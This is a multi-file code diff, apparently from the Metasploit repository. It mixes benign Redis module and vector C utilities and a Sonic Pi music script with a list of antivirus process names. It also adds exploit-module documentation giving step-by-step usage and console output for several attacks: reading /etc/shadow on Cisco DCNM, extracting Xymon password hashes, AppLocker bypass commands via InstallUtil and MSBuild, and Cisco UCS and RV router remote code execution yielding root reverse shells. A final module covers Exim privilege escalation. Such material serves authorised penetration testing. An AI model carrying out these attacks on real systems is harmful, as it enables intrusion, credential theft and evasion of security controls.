+    } else if (*c == 'd') {  // read double
+      double *d = va_arg(ap, double *);
+      if (RedisModule_StringToDouble(argv[i], d) != REDISMODULE_OK) {
+        return REDISMODULE_ERR;
+      }
+    } else if (*c == '*') {  // skip current arg
+      // do nothing
+    } else {
+      return REDISMODULE_ERR;  // WAT?
+    }
+    c++;
+    i++;
+  }
+  // if the format is longer than argc, retun an error
+  if (*c != 0) {
+    return REDISMODULE_ERR;
+  }
+  return REDISMODULE_OK;
+}
+
+int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt,
+                          ...) {
+
+  int pos = RMUtil_ArgIndex(token, argv, argc);
+  if (pos < 0) {
+    return REDISMODULE_ERR;
+  }
+
+  va_list ap;
+  va_start(ap, fmt);
+  int rc = rmutil_vparseArgs(argv, argc, pos + 1, fmt, ap);
+  va_end(ap);
+  return rc;
+}
+
+RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep,
+                                                              const char *path) {
+  if (rep == NULL) return NULL;
+
+  RedisModuleCallReply *ele = rep;
+  const char *s = path;
+  char *e;
+  long idx;
+  do {
+    errno = 0;
+    idx = strtol(s, &e, 10);
+
+    if ((errno == ERANGE && (idx == LONG_MAX || idx == LONG_MIN)) || (errno != 0 && idx == 0) ||
+        (REDISMODULE_REPLY_ARRAY != RedisModule_CallReplyType(ele)) || (s == e)) {
+      ele = NULL;
+      break;
+    }
+    s = e;
+    ele = RedisModule_CallReplyArrayElement(ele, idx - 1);
+
+  } while ((ele != NULL) && (*e != '\0'));
+
+  return ele;
+}
+
+int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out) {
+  if (key == NULL) {
+    return RMUTIL_VALUE_MISSING;
+  }
+  int keytype = RedisModule_KeyType(key);
+  if (keytype == REDISMODULE_KEYTYPE_EMPTY) {
+    return RMUTIL_VALUE_EMPTY;
+  } else if (keytype == REDISMODULE_KEYTYPE_MODULE && RedisModule_ModuleTypeGetType(key) == type) {
+    *out = RedisModule_ModuleTypeGetValue(key);
+    return RMUTIL_VALUE_OK;
+  } else {
+    return RMUTIL_VALUE_MISMATCH;
+  }
+}
+
+RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset,
+                                        const char *keyword, size_t *nargs) {
+  if (offset > argc) {
+    return NULL;
+  }
+
+  argv += offset;
+  argc -= offset;
+
+  int ix = RMUtil_ArgIndex(keyword, argv, argc);
+  if (ix < 0) {
+    return NULL;
+  } else if (ix >= argc - 1) {
+    *nargs = RMUTIL_VARARGS_BADARG;
+    return argv;
+  }
+
+  argv += (ix + 1);
+  argc -= (ix + 1);
+
+  long long n = 0;
+  RMUtil_ParseArgs(argv, argc, 0, "l", &n);
+  if (n > argc - 1 || n < 0) {
+    *nargs = RMUTIL_VARARGS_BADARG;
+    return argv;
+  }
+
+  *nargs = n;
+  return argv + 1;
+}
+
+void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value) {
+  RedisModuleCtx *ctx = RedisModule_GetThreadSafeContext(NULL);
+  RedisModuleCallReply *rep = RedisModule_Call(ctx, "DUMP", "s", key);
+  if (rep != NULL && RedisModule_CallReplyType(rep) == REDISMODULE_REPLY_STRING) {
+    size_t n;
+    const char *s = RedisModule_CallReplyStringPtr(rep, &n);
+    RedisModule_EmitAOF(aof, "RESTORE", "slb", key, 0, s, n);
+  } else {
+    RedisModule_Log(RedisModule_GetContextFromIO(aof), "warning", "Failed to emit AOF");
+  }
+  if (rep != NULL) {
+    RedisModule_FreeCallReply(rep);
+  }
+  RedisModule_FreeThreadSafeContext(ctx);
+}
@@ -0,0 +1,149 @@
+#ifndef __UTIL_H__
+#define __UTIL_H__
+
+#include <redismodule.h>
+#include <stdarg.h>
+
+/// make sure the response is not NULL or an error, and if it is sends the error to the client and
+/// exit the current function
+#define RMUTIL_ASSERT_NOERROR(ctx, r)                                   \
+  if (r == NULL) {                                                      \
+    return RedisModule_ReplyWithError(ctx, "ERR reply is NULL");        \
+  } else if (RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) { \
+    RedisModule_ReplyWithCallReply(ctx, r);                             \
+    return REDISMODULE_ERR;                                             \
+  }
+
+#define __rmutil_register_cmd(ctx, cmd, f, mode)                                \
+  if (RedisModule_CreateCommand(ctx, cmd, f, mode, 1, 1, 1) == REDISMODULE_ERR) \
+    return REDISMODULE_ERR;
+
+#define RMUtil_RegisterReadCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "readonly")
+
+#define RMUtil_RegisterWriteCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "write")
+
+/* RedisModule utilities. */
+
+/** DEPRECATED: Return the offset of an arg if it exists in the arg list, or 0 if it's not there */
+int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset);
+
+/* Same as argExists but returns -1 if not found. Use this, RMUtil_ArgExists is kept for backwards
+compatibility. */
+int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc);
+
+/**
+Automatically conver the arg list to corresponding variable pointers according to a given format.
+You pass it the command arg list and count, the starting offset, a parsing format, and pointers to
+the variables.
+The format is a string consisting of the following identifiers:
+
+    c -- pointer to a Null terminated C string pointer.
+    s -- pointer to a RedisModuleString
+    l -- pointer to Long long integer.
+    d -- pointer to a Double
+    * -- do not parse this argument at all
+
+Example: If I want to parse args[1], args[2] as a long long and double, I do:
+    double d;
+    long long l;
+    RMUtil_ParseArgs(argv, argc, 1, "ld", &l, &d);
+*/
+int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...);
+
+/**
+Same as RMUtil_ParseArgs, but only parses the arguments after `token`, if it was found.
+This is useful for optional stuff like [LIMIT [offset] [limit]]
+*/
+int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt,
+                          ...);
+
+int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap);
+
+#define RMUTIL_VARARGS_BADARG ((size_t)-1)
+/**
+ * Parse arguments in the form of KEYWORD {len} {arg} .. {arg}_len.
+ * If keyword is present, returns the position within `argv` containing the arguments.
+ * Returns NULL if the keyword is not found.
+ * If a parse error has occurred, `nargs` is set to RMUTIL_VARARGS_BADARG, but
+ * the return value is not NULL.
+ */
+RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset,
+                                        const char *keyword, size_t *nargs);
+
+/**
+ * Default implementation of an AoF rewrite function that simply calls DUMP/RESTORE
+ * internally. To use this function, pass it as the .aof_rewrite value in
+ * RedisModuleTypeMethods
+ */
+void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value);
+
+// A single key/value entry in a redis info map
+typedef struct {
+  char *key;
+  char *val;
+} RMUtilInfoEntry;
+
+// Representation of INFO command response, as a list of k/v pairs
+typedef struct {
+  RMUtilInfoEntry *entries;
+  int numEntries;
+} RMUtilInfo;
+
+/**
+* Get redis INFO result and parse it as RMUtilInfo.
+* Returns NULL if something goes wrong.
+* The resulting object needs to be freed with RMUtilRedisInfo_Free
+*/
+RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx);
+
+/**
+* Free an RMUtilInfo object and its entries
+*/
+void RMUtilRedisInfo_Free(RMUtilInfo *info);
+
+/**
+* Get an integer value from an info object. Returns 1 if the value was found and
+* is an integer, 0 otherwise. the value is placed in 'val'
+*/
+int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val);
+
+/**
+* Get a string value from an info object. The value is placed in str.
+* Returns 1 if the key was found, 0 if not
+*/
+int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str);
+
+/**
+* Get a double value from an info object. Returns 1 if the value was found and is
+* a correctly formatted double, 0 otherwise. the value is placed in 'd'
+*/
+int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d);
+
+/*
+* Returns a call reply array's element given by a space-delimited path. E.g.,
+* the path "1 2 3" will return the 3rd element from the 2 element of the 1st
+* element from an array (or NULL if not found)
+*/
+RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep,
+                                                              const char *path);
+
+/**
+ * Extract the module type from an opened key.
+ */
+typedef enum {
+  RMUTIL_VALUE_OK = 0,
+  RMUTIL_VALUE_MISSING,
+  RMUTIL_VALUE_EMPTY,
+  RMUTIL_VALUE_MISMATCH
+} RMUtil_TryGetValueStatus;
+
+/**
+ * Tries to extract the module-specific type from the value.
+ * @param key an opened key (may be null)
+ * @param type the pointer to the type to match to
+ * @param[out] out if the value is present, will be set to it.
+ * @return a value in the @ref RMUtil_TryGetValueStatus enum.
+ */
+int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out);
+
+#endif
@@ -0,0 +1,88 @@
+#include "vector.h"
+#include <stdio.h>
+
+inline int __vector_PushPtr(Vector *v, void *elem) {
+  if (v->top == v->cap) {
+    Vector_Resize(v, v->cap ? v->cap * 2 : 1);
+  }
+
+  __vector_PutPtr(v, v->top, elem);
+  return v->top;
+}
+
+inline int Vector_Get(Vector *v, size_t pos, void *ptr) {
+  // return 0 if pos is out of bounds
+  if (pos >= v->top) {
+    return 0;
+  }
+
+  memcpy(ptr, v->data + (pos * v->elemSize), v->elemSize);
+  return 1;
+}
+
+/* Get the element at the end of the vector, decreasing the size by one */
+inline int Vector_Pop(Vector *v, void *ptr) {
+  if (v->top > 0) {
+    if (ptr != NULL) {
+      Vector_Get(v, v->top - 1, ptr);
+    }
+    v->top--;
+    return 1;
+  }
+  return 0;
+}
+
+inline int __vector_PutPtr(Vector *v, size_t pos, void *elem) {
+  // resize if pos is out of bounds
+  if (pos >= v->cap) {
+    Vector_Resize(v, pos + 1);
+  }
+
+  if (elem) {
+    memcpy(v->data + pos * v->elemSize, elem, v->elemSize);
+  } else {
+    memset(v->data + pos * v->elemSize, 0, v->elemSize);
+  }
+  // move the end offset to pos if we grew
+  if (pos >= v->top) {
+    v->top = pos + 1;
+  }
+  return 1;
+}
+
+int Vector_Resize(Vector *v, size_t newcap) {
+  int oldcap = v->cap;
+  v->cap = newcap;
+
+  v->data = realloc(v->data, v->cap * v->elemSize);
+
+  // If we grew:
+  // put all zeros at the newly realloc'd part of the vector
+  if (newcap > oldcap) {
+    int offset = oldcap * v->elemSize;
+    memset(v->data + offset, 0, v->cap * v->elemSize - offset);
+  }
+  return v->cap;
+}
+
+Vector *__newVectorSize(size_t elemSize, size_t cap) {
+  Vector *vec = malloc(sizeof(Vector));
+  vec->data = calloc(cap, elemSize);
+  vec->top = 0;
+  vec->elemSize = elemSize;
+  vec->cap = cap;
+
+  return vec;
+}
+
+void Vector_Free(Vector *v) {
+  free(v->data);
+  free(v);
+}
+
+
+/* return the used size of the vector, regardless of capacity */
+inline int Vector_Size(Vector *v) { return v->top; }
+
+/* return the actual capacity */
+inline int Vector_Cap(Vector *v) { return v->cap; }
@@ -0,0 +1,73 @@
+#ifndef __VECTOR_H__
+#define __VECTOR_H__
+#include <stdlib.h>
+#include <string.h>
+#include <stdarg.h>
+
+/*
+* Generic resizable vector that can be used if you just want to store stuff
+* temporarily.
+* Works like C++ std::vector with an underlying resizable buffer
+*/
+typedef struct {
+    char *data;
+    size_t elemSize;
+    size_t cap;
+    size_t top;
+
+} Vector;
+
+/* Create a new vector with element size. This should generally be used
+ * internall by the NewVector macro */
+Vector *__newVectorSize(size_t elemSize, size_t cap);
+
+// Put a pointer in the vector. To be used internall by the library
+int __vector_PutPtr(Vector *v, size_t pos, void *elem);
+
+/*
+* Create a new vector for a given type and a given capacity.
+* e.g. NewVector(int, 0) - empty vector of ints
+*/
+#define NewVector(type, cap) __newVectorSize(sizeof(type), cap)
+
+/*
+* get the element at index pos. The value is copied in to ptr. If pos is outside
+* the vector capacity, we return 0
+* otherwise 1
+*/
+int Vector_Get(Vector *v, size_t pos, void *ptr);
+
+/* Get the element at the end of the vector, decreasing the size by one */
+int Vector_Pop(Vector *v, void *ptr);
+
+//#define Vector_Getx(v, pos, ptr) pos < v->cap ? 1 : 0; *ptr =
+//*(typeof(ptr))(v->data + v->elemSize*pos)
+
+/*
+* Put an element at pos.
+* Note: If pos is outside the vector capacity, we resize it accordingly
+*/
+#define Vector_Put(v, pos, elem) __vector_PutPtr(v, pos, elem ? &(typeof(elem)){elem} : NULL)
+
+/* Push an element at the end of v, resizing it if needed. This macro wraps
+ * __vector_PushPtr */
+#define Vector_Push(v, elem) __vector_PushPtr(v, elem ? &(typeof(elem)){elem} : NULL)
+
+int __vector_PushPtr(Vector *v, void *elem);
+
+/* resize capacity of v */
+int Vector_Resize(Vector *v, size_t newcap);
+
+/* return the used size of the vector, regardless of capacity */
+int Vector_Size(Vector *v);
+
+/* return the actual capacity */
+int Vector_Cap(Vector *v);
+
+/* free the vector and the underlying data. Does not release its elements if
+ * they are pointers*/
+void Vector_Free(Vector *v);
+
+int __vecotr_PutPtr(Vector *v, size_t pos, void *elem);
+
+#endif
@@ -0,0 +1,58 @@
+use_bpm 130
+use_synth_defaults sustain: 0
+
+live_loop :drums do
+  sample :drum_heavy_kick, amp: 2
+  sleep 1
+  sample :drum_snare_hard
+  sleep 1
+end
+
+live_loop :hi_hat do
+  sample :drum_cymbal_closed, amp: 0.5
+  sleep 0.5
+end
+
+live_loop :bass do
+  use_synth :pluck
+
+  notes = %i[
+    Eb3  Eb3  Eb3
+    B2   B2   B2
+    Fs2  Fs2  Fs2
+    As2  As2  As2  As2
+  ]
+
+  beats = %w[
+    2.0  1.0  1.0
+    2.0  1.0  1.0
+    2.0  1.0  1.0
+    1.5  1.0  0.5  1.0
+  ].map(&:to_f)
+
+  with_fx :reverb do
+    play_pattern_timed notes, beats
+  end
+end
+
+live_loop :lead do
+  use_synth :piano
+
+  notes = %i[
+    As4   As4   As4   As4   Gs4   As4   As4
+    As4   As4   As4   Gs4   As4   As4
+    Db5   As4   Gs4   Fs4
+    Eb4   Eb4   F4    Fs4   Eb4
+  ]
+
+  beats = %w[
+    2.00  0.50  0.25  0.25  0.25  0.75  2.00
+    0.50  0.25  0.25  0.25  0.75  1.50
+    1.00  1.00  1.00  1.00
+    0.50  0.50  0.50  0.50  0.50
+  ].map(&:to_f)
+
+  with_fx :reverb do
+    play_pattern_timed notes, beats
+  end
+end
@@ -1,3 +1,12 @@
+AlMon.exe 
+SAVAdminService.exe 
+SavService.exe 
+SNTPService.exe 
+swc_service.exe 
+swi_fc.exe
+swi_filter.exe
+swi_service.exe 
+swi_fc.exe  
 emet_agent.exe
 emet_service.exe
 firesvc.exe
@@ -0,0 +1,42 @@
+## Intro
+
+Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
+An authenticated user can abuse this servlet to download arbitrary files as root by specifying
+the full path of the file (aka CVE-2019-1621).
+
+This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
+work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
+(see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.
+
+
+## Author and discoverer
+
+Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
+
+
+## References
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
+https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
+https://seclists.org/fulldisclosure/2019/Jul/7
+
+
+## Usage
+
+Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!
+
+```
+msf5 exploit(multi/http/cisco_dcnm_upload_2019) > use auxiliary/admin/cisco/cisco_dcnm_download
+
+msf5 auxiliary(admin/cisco/cisco_dcnm_download) > set rhost 10.75.1.40
+rhost => 10.75.1.40
+msf5 auxiliary(admin/cisco/cisco_dcnm_download) > run
+
+[+] 10.75.1.40:443 - Detected DCNM 10.4(2)
+[*] 10.75.1.40:443 - No authentication required, ready to exploit!
+[+] 10.75.1.40:443 - Got sysTime value 1567081446000
+[+] 10.75.1.40:443 - Successfully authenticated our JSESSIONID cookie
+[+] File saved in: /home/john/.msf4/loot/20190829122407_default_10.75.1.40_ciscoDCNM.http_855907.bin
+[*] Auxiliary module execution completed
+```
@@ -1,10 +1,10 @@
 ## Description

-This (Interesting Data Finder) module will connect to a remote MSSQL server using a given set of credentials and search for rows and columns with “interesting” names. This information can help you fine-tune further attacks against the database.
+This (Interesting Data Finder) module will connect to a remote MSSQL server using a given set of credentials and search for rows and columns with "interesting" names. This information can help you fine-tune further attacks against the database.

 ## Verification Steps

-1. Do: ```use auxiliary/scanner/mssql/mssql_idf```
+1. Do: ```use auxiliary/admin/mssql/mssql_idf```
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set THREADS [number of threads]```
 4. Do: ```run```
@@ -4,7 +4,7 @@ This module allows you to perform SQL queries against a database using known-goo

 ## Verification Steps

-1. Do: ```use auxiliary/scanner/mssql/mssql_sql```
+1. Do: ```use auxiliary/admin/mssql/mssql_sql```
 2. Do: ```set PASSWORD [password1]```
 3. Do: ```set RHOSTS [IP]```
 4. Do: ```set [SQL Command]```
@@ -13,11 +13,10 @@ You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
 ## Actions

 ```
-Available actions:
-  Name  Description
-  ----  -----------
-  Cook  Cook stuff
-  Stop  Stop cooking
+Name  Description
+----  -----------
+Cook  Cook stuff
+Stop  Stop cooking
 ```

 ## Options
@@ -0,0 +1,79 @@
+## Description
+
+  This module retrieves information from a Xymon daemon service
+  (formerly Hobbit, based on Big Brother), including server
+  configuration information, a list of monitored hosts, and
+  associated client log for each host.
+
+  This module also retrieves usernames and password hashes from
+  the `xymonpasswd` config file from Xymon servers before 4.3.25,
+  which permit download arbitrary config files (CVE-2016-2055),
+  and servers configured with `ALLOWALLCONFIGFILES` enabled.
+
+
+## Vulnerable Application
+
+  [Xymon](http://xymon.sourceforge.net/) is a system for monitoring servers and networks.
+
+  Xymon packages are available in software repositories for various Linux distributions :
+
+  ```
+  sudo apt-get install xymon
+  ```
+
+  Refer to http://xymon.sourceforge.net/xymon/help/install.html for more information.
+
+  A Xymon virtual appliance is also available :
+
+  * https://sourceforge.net/projects/xymon/files/Xymon/4.3.10/VM/
+
+  To expose the `xymonpasswd` file, add the following line to `/etc/xymon/xymonserver.cfg` :
+
+  ```
+  ALLOWALLCONFIGFILES="TRUE"
+  ```
+
+  And restart the service with : `service xymon restart`.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use use auxiliary/gather/xymon_info`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. You should receive server and client host information
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/gather/xymon_info 
+  msf5 auxiliary(gather/xymon_info) > set rhosts 172.16.191.250
+  rhosts => 172.16.191.250
+  msf5 auxiliary(gather/xymon_info) > run
+  [*] Running module against 172.16.191.250
+
+  [*] 172.16.191.250:1984 - Xymon daemon version 4.3.28
+  [*] 172.16.191.250:1984 - Retrieving configuration files ...
+  [+] 172.16.191.250:1984 - xymonserver.cfg (18347 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.xym_136371.txt
+  [+] 172.16.191.250:1984 - hosts.cfg (745 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.hos_647070.txt
+  [+] 172.16.191.250:1984 - xymonpasswd (44 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.xym_182226.txt
+  [+] 172.16.191.250:1984 - Credentials: admin : $apr1$axRTeLB1$TFmoeLwRnus.Yhr5fJmc1.
+  [*] 172.16.191.250:1984 - Retrieving host list ...
+  [+] 172.16.191.250:1984 - Host info (127 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.hostinfo_254799.txt
+  [+] 172.16.191.250:1984 - Found 3 hosts
+  [*] 172.16.191.250:1984 - Retrieving client logs ...
+  [+] 172.16.191.250:1984 - debian-9-6-0-x64-xfce.local client log (87942 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.hosts.debi_671716.txt
+  [*] 172.16.191.250:1984 - test-host client log is empty
+  [*] 172.16.191.250:1984 - another-test-host client log is empty
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(gather/xymon_info) > creds
+  Credentials
+  ===========
+
+  host            origin          service            public  private                                realm  private_type        JtR Format
+  ----            ------          -------            ------  -------                                -----  ------------        ----------
+  172.16.191.250  172.16.191.250  1984/tcp (xymond)  admin   $apr1$axRTeLB1$TFmoeLwRnus.Yhr5fJmc1.         Nonreplayable hash  md5crypt
+  ```
+
@@ -0,0 +1,30 @@
+## Intro
+
+This module is designed to evade solutions such as software restriction policies and Applocker.
+Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories.
+Applocker enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows"
+The main vector for this bypass is to use the trusted binary InstallUtil.exe to execute user supplied code as this binary is located within the trusted Windows directory.
+
+## Vulnerable Application
+
+This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active, that do not explicitly block InstallUtill.exe or the "Microsoft.Net" directory.
+
+## Options
+
+- **FILENAME** - Filename for the evasive file (default: install_util.txt).
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use evasion/windows/applocker_evasion_install_util`
+  3. Do: `set PAYLOAD <payload>`
+  4. Do: `run`
+  5. The module will now display instructions of how to proceed
+  6. `[+] install_util.txt stored at /root/.msf4/local/install_util.txt`
+  7. `[*] Copy install_util.txt to the target`
+  8. `[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319").
+  9. `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319").
+
+## References
+
+https://attack.mitre.org/techniques/T1118/
@@ -0,0 +1,29 @@
+## Intro
+
+This module is designed to evade solutions such as software restriction policies and Applocker.
+Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories.
+Applocker enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows"
+The main vector for this bypass is to use the trusted binary MSBuild.exe to execute user supplied code as this binary is located within the trusted Windows directory.
+
+## Vulnerable Application
+
+This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active, that do not explicitly block MSBuild.exe or the "Microsoft.Net" directory.
+
+## Options
+
+- **FILENAME** - Filename for the evasive file (default: msbuild.txt).
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use evasion/windows/applocker_evasion_msbuild`
+  3. Do: `set PAYLOAD <payload>`
+  4. Do: `run`
+  5. The module will now display instructions of how to proceed
+  6. `[+] msbuild.txt stored at /root/.msf4/local/msbuild.txt`
+  7. `[*] Copy msbuild.txt to the target`
+  8. `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\MSBuild.exe msbuild.txt` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319").
+
+## References
+
+https://attack.mitre.org/techniques/T1127/
@@ -0,0 +1,59 @@
+## Intro
+
+The Cisco UCS Director virtual appliance contains two flaws that can be combined
+and abused by an attacker to achieve remote code execution as root.
+
+The first one, CVE-2019-1937, is an authentication bypass, that allows the
+attacker to authenticate as an administrator.
+
+The second one, CVE-2019-1936, is a command injection in a password change form,
+that allows the attacker to inject commands that will execute as root.
+
+This module combines both vulnerabilities to achieve the unauthenticated command
+injection as root.
+It has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
+Note that Cisco also mentions in their advisory that their IMC Supervisor and
+UCS Director Express are also affected by these vulnerabilities, but this module
+was not tested with those products.
+
+
+## Author and discoverer
+
+Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
+
+
+## References
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj
+FULL_DISC
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
+
+
+## Usage
+
+Setup RHOST, LHOST, LPORT and run it!
+
+```
+msf5 exploit(linux/ssh/cisco_ucs_scpuser) > use exploit/linux/http/cisco_ucs_rce
+msf5 exploit(linux/http/cisco_ucs_rce) > set rhost 10.9.8.121
+rhost => 10.9.8.121
+msf5 exploit(linux/http/cisco_ucs_rce) > set lhost 10.9.8.1
+lhost => 10.9.8.1
+msf5 exploit(linux/http/cisco_ucs_rce) > run
+
+[*] Started reverse TCP handler on 10.9.8.1:4444
+[+] 10.9.8.121:443 - Successfully bypassed auth and got our admin JSESSIONID cookie!
+[+] 10.9.8.121:443 - Shelly is here, press ENTER to start playing with her!
+[*] Command shell session 2 opened (10.9.8.1:4444 -> 10.9.8.121:34778) at 2019-08-29 22:28:01 +0700
+
+[root@localhost inframgr]# whoami
+whoami
+root
+[root@localhost inframgr]# ^C
+Abort session 2? [y/N]  y
+""
+
+[*] 10.9.8.121 - Command shell session 2 closed.  Reason: User exit
+msf5 exploit(linux/http/cisco_ucs_rce) >
+```
@@ -0,0 +1,25 @@
+# Cisco RV110W/RV130W/RV215W Routers Management Interface Remote Command Execution
+
+A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.
+
+## Vulnerable Device
+
+* RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.
+* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cve_2019_1663_cisco_rmi_rce```
+3. ```set rhost [IP]```
+4. ```set payload linux/armle/meterpreter_reverse_tcp```
+5. ```set lhost [IP]```
+6. ```exploit```
+7. You should get a session
+
@@ -0,0 +1,90 @@
+# Vulnerable Application
+
+Exim 4.87 - 4.91 Local Privilege Escalation
+
+This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149). 
+
+Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.
+
+# Creating A Testing Environment
+
+You basically just need to have a exim (between 4.87 and 4.91 inclusive) running and listening on a port (port 25 by default).
+For my tests, I used a VM with Ubuntu 18.04 LTS and exim 4.89 (I tested all the versions from 4.87 to 4.91). The exim source code can be downloaded from the official website (all the old versions can be found).
+You can also use this good Docker image which sets up a container with a vulnerable exim version running (https://github.com/dhn/exploits/tree/master/CVE-2019-10149).
+Be careful if you use the exim package from the official repo of your Linux distribution, even if the version is between 4.87 and 4.91, it may still be patched against the vulnerability (it is the case on Ubuntu at least).
+
+Before using the exploit, make sure exim is actually listening on a port (it may sound stupid, but I struggled a bit when creating a testing environment). However, you should not have any problem if you use the Docker image linked above.
+
+# Verification Steps
+
+1. `use exploit/linux/local/exim4_deliver_message_priv_esc`
+2. `set SESSION [session]`
+3. `set PAYLOAD [payload]`
+4. `set LHOST [lhost]`
+5. `set LPORT [lport]`
+6. `exploit`
+
+# Options
+
+## PAYLOAD
+
+Set this option to choose which type of root session you want to create.
+
+## EXIMPORT
+
+The port that exim is listening to. On most cases it will be port 25 (which is the default).
+
+## ForceExploit
+
+Force exploit even if the current session is root.
+    
+## SendExpectTimeout
+
+Timeout per send/expect when communicating with exim.
+
+## WritableDir
+
+A directory where we can write files (default is /tmp).
+
+
+# Scenarios
+
+## Privilege escalation starting with a meterpreter shell
+
+```
+meterpreter > getuid
+Server username: uid=1000, gid=1000, euid=1000, egid=1000
+meterpreter > 
+Background session 1? [y/N]  
+msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc 
+msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
+session => 1
+msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
+lhost => 192.168.0.50
+msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lport 13371
+lport => 13371
+msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set EXIMPATH /usr/exim/bin/exim
+EXIMPATH => /usr/exim/bin/exim
+msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
+[*] The target appears to be vulnerable.
+msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 192.168.0.50:13371 
+[*] Payload sent, wait a few seconds...
